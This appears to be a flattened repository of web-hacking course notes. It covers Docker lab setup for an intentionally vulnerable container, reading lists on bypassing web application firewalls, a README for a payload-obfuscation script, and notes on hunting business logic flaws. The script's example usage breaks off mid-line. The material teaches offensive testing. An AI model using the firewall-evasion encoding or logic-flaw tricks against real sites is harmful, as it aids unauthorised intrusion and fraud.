You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/images/character-interpretations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/images/character-interpretations.png -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/images/how-wafs-work.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/images/how-wafs-work.png -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/images/waf-general-arch.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/images/waf-general-arch.png -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/others/README.md: -------------------------------------------------------------------------------- 1 | ## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/others/obfu.py) 2 | > A small script to encode and obfuscate your payloads easily to your desired encodings. 3 | 4 | ### Usage: 5 | ``` 6 | $ python obfu.py -h 7 | 8 | OBFUSCATOR 9 | 10 | usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi] 11 | 12 | Required Arguments: 13 | -s STR, --str STR String to obfuscate 14 | -e ENC, --enc ENC Encoding type. eg: ibm037, utf16, etc 15 | 16 | Optional Arguments: 17 | -ueo URL Encode Output 18 | -udi URL Decode Input 19 | ``` 20 | ### Example Usage: 21 | ``` 22 | $ python3 obfu.py -s 'param= 1: 57 | parser.print_help() 58 | quit() 59 | print('Input: %s' % (args.str)) 60 | print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo))) 61 | 62 | if __name__ == '__main__': 63 | main() 64 | -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Artificial Neural Network based WAF for SQL Injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Artificial Neural Network based WAF for SQL Injection.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Bypassing WAF XSS Detection Mechanisms.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Bypassing WAF XSS Detection Mechanisms.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Evading All Web-Application Firewalls XSS Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Evading All Web-Application Firewalls XSS Filters.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Poking A Hole In The Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Poking A Hole In The Firewall.pdf 
-------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/SANS Guide - WAF Evasion Testing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/SANS Guide - WAF Evasion Testing.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/WASC WAF Evaluation Criteria.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/WASC WAF Evaluation Criteria.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/papers/Web Application Firewalls - Evaluation and Analysis.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/papers/Web Application Firewalls - Evaluation and Analysis.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/A Forgotten HTTP Invisibility Cloak.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/A Forgotten HTTP Invisibility Cloak.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Building Your 
Own WAF as a Service and Forgetting about False Positives.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Methods To Bypass A Web Application Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Methods To Bypass A Web Application Firewall.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/OWASP WAF Profiling & Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/OWASP WAF Profiling & Evasion.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Playing Around with WAFs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Playing Around with WAFs.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/Side Channel Attacks for Fingerprinting WAF Filter 
Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/WAF Bypasses and PHP Exploits (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/WAF Bypasses and PHP Exploits (Slides).pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/firewallBypass/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf -------------------------------------------------------------------------------- /lesson_notes/docker_course/01.dockerBasic.md: -------------------------------------------------------------------------------- 1 |

Basic Practical Docker and Containerization

2 | 3 | ## What is Docker? 4 | 5 | [Reference Photo Link](https://www.accenture.com/us-en/blogs/software-engineering-blog/shinde-docker-containerization-devops) 6 | 7 | ![Docker Explain](../photo/docker.png) 8 | 9 | ## Docker images VS Container 10 | 11 | ![ContVsImage](../photo/docker2.png) 12 | 13 | ## Install Docker and skopeo on Linux 14 | `sudo apt install docker.io` 15 | 16 | `sudo apt install skopeo` 17 | 18 | ## Enable Docker on linux 19 | `sudo systemctl enable docker --now` 20 | 21 | ## You can now use docker with sudo. If you want to add yourself to the docker group to use docker without sudo, one additional step is needed (note that members of the docker group can control the Docker daemon, which is effectively root access on the host, so only add accounts you would trust with root): 22 | 23 | `sudo usermod -aG docker $USER` 24 | 25 | # Essential Commands 26 | 27 | >### Searching for a Docker image in a repository (DockerHub) 28 | >`sudo docker search imageName` 29 | 30 | >### Pulling (downloading) images to the local computer 31 | >`sudo docker pull imageName` 32 | 33 | >### How to list local images 34 | >`sudo docker images` 35 | > 36 | >### How to inspect a local image (show detailed image information) 37 | >`sudo docker inspect ImageID` 38 | > 39 | >### How to inspect remote registry images 40 | >`skopeo inspect docker://mysql` 41 | 42 | 43 | ## How to run local container images 44 | ``` 45 | sudo docker images 46 | sudo docker run imageid 47 | ``` 48 | ## How to find running containers (Docker treats a container as a process) 49 | 50 | `sudo docker ps` 51 | 52 | `sudo docker container ls` 53 | 54 | ## How to list all containers (including stopped containers) 55 | `sudo docker ps -a` 56 | 57 | ## How to save a docker image on the local computer (.tar format) 58 | 59 | `docker save imagesID > ImageName.tar` 60 | 61 | ## How to remove a docker container 62 | 63 | `sudo docker rm containerID or Name` 64 | 65 | ## How to remove docker images 66 | 67 | `sudo docker rmi imageID or Name` 68 | 69 | ## Checking Docker Resource Usage 70 | 71 | `sudo docker stats` 72 | 73 |

Container Management with Portainer (Web App)

74 | 75 | ## Install the portainer docker image 76 | 77 | `docker search portainer` 78 | 79 | `docker pull portainer/portainer-ce` 80 | 81 | 82 | ## Run the portainer docker image 83 | 84 | Note: mounting `/var/run/docker.sock` into the container gives Portainer full control of the Docker daemon (effectively root on the host), so set a strong admin password on first login and do not expose port 9000 to untrusted networks. 85 | `docker run --name portainer -p 9000:9000 -v "/var/run/docker.sock:/var/run/docker.sock" imageID or Name` 86 | 87 | ### Notes 88 | > * you can use my portainer script to run portainer 89 | > * please disconnect any VPN first, otherwise localhost may not work 90 | > * you can use the docker IP and port instead of localhost and the local port 91 |

ZD Lab Installation for Pentest

2 | 3 | ## Steps for Lab Installation 4 | 5 | 1. Install docker software in Linux 6 | 2. Pull the docker image 7 | 3. Kill the server 8 | 4. Scripting 9 | 10 | 11 | 12 | 13 | ## Install Docker in Linux 14 | `sudo apt install docker.io` 15 | 16 | ## Enable Docker 17 | 18 | `sudo systemctl enable docker --now` 19 | 20 | 21 | ## You can now use docker with sudo. If you want to add yourself to the docker group to use docker without sudo, one additional step is needed (note that members of the docker group can control the Docker daemon, which is effectively root access on the host): 22 | 23 | `sudo usermod -aG docker $USER` 24 | 25 | 26 | 27 | ## Pull the docker image and install it 28 | Note: `-p 8080:80` publishes the lab on every interface of the host; since this image is intentionally vulnerable, bind it to loopback with `-p 127.0.0.1:8080:80` unless you deliberately want it reachable from the network. 29 | > ## Interactive mode 30 | 31 | > `sudo docker run -p 8080:80 -it zdresearch/advanced-web-hacking http://localhost:8080` 32 | 33 | > ## Daemon mode (detached) 34 | > `sudo docker run -p 8080:80 -td zdresearch/advanced-web-hacking http://localhost:8080` 35 | 36 | ## How to kill the server 37 | 38 | `sudo docker kill imageid` -------------------------------------------------------------------------------- /lesson_notes/docker_course/lab.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | read -p "Enter port number you want to bind: " port 5 | sudo docker run -p $port:80 -it zdresearch/advanced-web-hacking http://localhost:$port 6 | 7 | -------------------------------------------------------------------------------- /lesson_notes/docker_course/portainer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | read -p "Please port nubmer your want to bind : " port 4 | read -p "Please enter name for container : " name 5 | 6 | sudo docker run --name $name -p $port:9000 -v "/var/run/docker.sock:/var/run/docker.sock" portainer/portainer-ce 7 | 8 | -------------------------------------------------------------------------------- /lesson_notes/photo/HTTP.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/HTTP.png -------------------------------------------------------------------------------- /lesson_notes/photo/URL_structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/URL_structure.png -------------------------------------------------------------------------------- /lesson_notes/photo/anti_csrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/anti_csrf.png -------------------------------------------------------------------------------- /lesson_notes/photo/client&server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/client&server.png -------------------------------------------------------------------------------- /lesson_notes/photo/com_inject.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/com_inject.png -------------------------------------------------------------------------------- /lesson_notes/photo/csrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/csrf.png -------------------------------------------------------------------------------- /lesson_notes/photo/csrf_lab.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/csrf_lab.png -------------------------------------------------------------------------------- /lesson_notes/photo/docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/docker.png -------------------------------------------------------------------------------- /lesson_notes/photo/docker2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/docker2.png -------------------------------------------------------------------------------- /lesson_notes/photo/http_structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/http_structure.png -------------------------------------------------------------------------------- /lesson_notes/photo/inband.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/inband.png -------------------------------------------------------------------------------- /lesson_notes/photo/oob.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/oob.png -------------------------------------------------------------------------------- /lesson_notes/photo/openBounty_1.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openBounty_1.png -------------------------------------------------------------------------------- /lesson_notes/photo/openBounty_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openBounty_2.png -------------------------------------------------------------------------------- /lesson_notes/photo/openBounty_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openBounty_3.png -------------------------------------------------------------------------------- /lesson_notes/photo/openRe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/openRe.png -------------------------------------------------------------------------------- /lesson_notes/photo/phishing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/phishing.png -------------------------------------------------------------------------------- /lesson_notes/photo/report.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/report.png -------------------------------------------------------------------------------- /lesson_notes/photo/request_header.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/request_header.png -------------------------------------------------------------------------------- /lesson_notes/photo/sav.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sav.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli2.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli3.png -------------------------------------------------------------------------------- /lesson_notes/photo/sqli4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/sqli4.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf1.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf1.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf2.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf3.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf4.png -------------------------------------------------------------------------------- /lesson_notes/photo/ssrf5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/ssrf5.png -------------------------------------------------------------------------------- /lesson_notes/photo/url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/url.png -------------------------------------------------------------------------------- /lesson_notes/photo/waf.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/waf.png -------------------------------------------------------------------------------- /lesson_notes/photo/waf_function.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/waf_function.png -------------------------------------------------------------------------------- /lesson_notes/photo/webArchi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/photo/webArchi.png -------------------------------------------------------------------------------- /lesson_notes/w-10.0_Logic_flaws/logic_flaw_theory.md: -------------------------------------------------------------------------------- 1 | # Business Logic Flaws (or) Logic Flaws 2 | 3 | [Reference](https://portswigger.net/web-security/logic-flaws/examples) 4 | 5 | 6 | - A vulnerability in the `design and implementation` of an application 7 | - If the logic or rules are directly related to the business, they are known as `business logic flaws`. If not, they are known as `application logic vulnerabilities` or `logic flaws` 8 | - Can be found in complicated systems because the development team themselves do not fully understand them 9 | - Most security problems are weaknesses in an application that result from a broken or missing security control (authentication, access control, input validation, etc…) 10 | - If the developers assume that users will pass data exclusively `via a web browser`, the application may rely entirely on `weak client-side controls` to validate input. These are easily `bypassed by an attacker using an intercepting proxy`. 
11 | 12 | 13 | # Impact of Business Logic Flaws 14 | 15 | - It is a broad category and the impact is highly variable 16 | - The impact of any logic flaw depends on what functionality it is related to 17 | - If the flaw is in the authentication mechanism, for example, this could have a serious impact on your overall security. Attackers could potentially exploit this for privilege escalation, or to bypass authentication entirely, gaining access to sensitive data and functionality 18 | - Flawed logic in financial transactions can obviously lead to massive losses for the business through stolen funds, fraud, and so on. 19 | 20 | 21 | # How to prevent 22 | 23 | - Make sure developers and testers understand the domain that the application serves 24 | - Maintain clear design documents and data flows for all transactions and workflows 25 | - Write code as clearly as possible 26 | - Note any references to other code that uses each component. Think about any side-effects of these dependencies if a malicious party were to manipulate them in an unusual way 27 | -------------------------------------------------------------------------------- /lesson_notes/w-10.0_Logic_flaws/methodology.md: -------------------------------------------------------------------------------- 1 | # Methodology for Hunting Logic Bugs 2 | 3 | 1. Click every button and map the application logic (which steps depend on which, and where state is stored) 4 | 2. Make numbers negative (quantities, prices, transfer amounts) 5 | 3. Use fractional numbers (e.g `100*0.5`) and check for rounding or truncation 6 | 4. 
Change other user information -------------------------------------------------------------------------------- /lesson_notes/w-2.1_webArchi_Ref/UNIT 6(WWW&HTTP&WAP).pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/w-2.1_webArchi_Ref/UNIT 6(WWW&HTTP&WAP).pptx -------------------------------------------------------------------------------- /lesson_notes/w-2.1_webArchi_Ref/Web_Architecture.md: -------------------------------------------------------------------------------- 1 |

How Website Work

2 |
3 | 4 | # Web Architecture 5 |
6 | 7 | ![Web Archi](../photo/webArchi.png) 8 | 9 |
10 | 11 | # Client and server site
12 | 13 | ![Web Archi](../photo/client&server.png) 14 | 15 | ## Client Side 16 | 17 | 1. HTML 18 | 2. CSS 19 | 3. JavaScript 20 | 21 | Client-side code runs in the user's browser and is entirely under the user's (or attacker's) control, so it can never be relied on for security decisions. 22 | ## Server side 23 | 24 | 1. PHP 25 | 2. Python 26 | 3. MySQL 27 | 4. etc.... 28 | 29 | # URL (Uniform Resource Locator) 30 | 31 | ## The uniform resource locator (URL) is a standard for specifying any kind of information on the Internet. 32 | ## URL defines four things: 33 | * Protocol (scheme) 34 | * host computer 35 | * Port 36 | * path (optionally followed by a `?query` string and a `#fragment`) 37 |
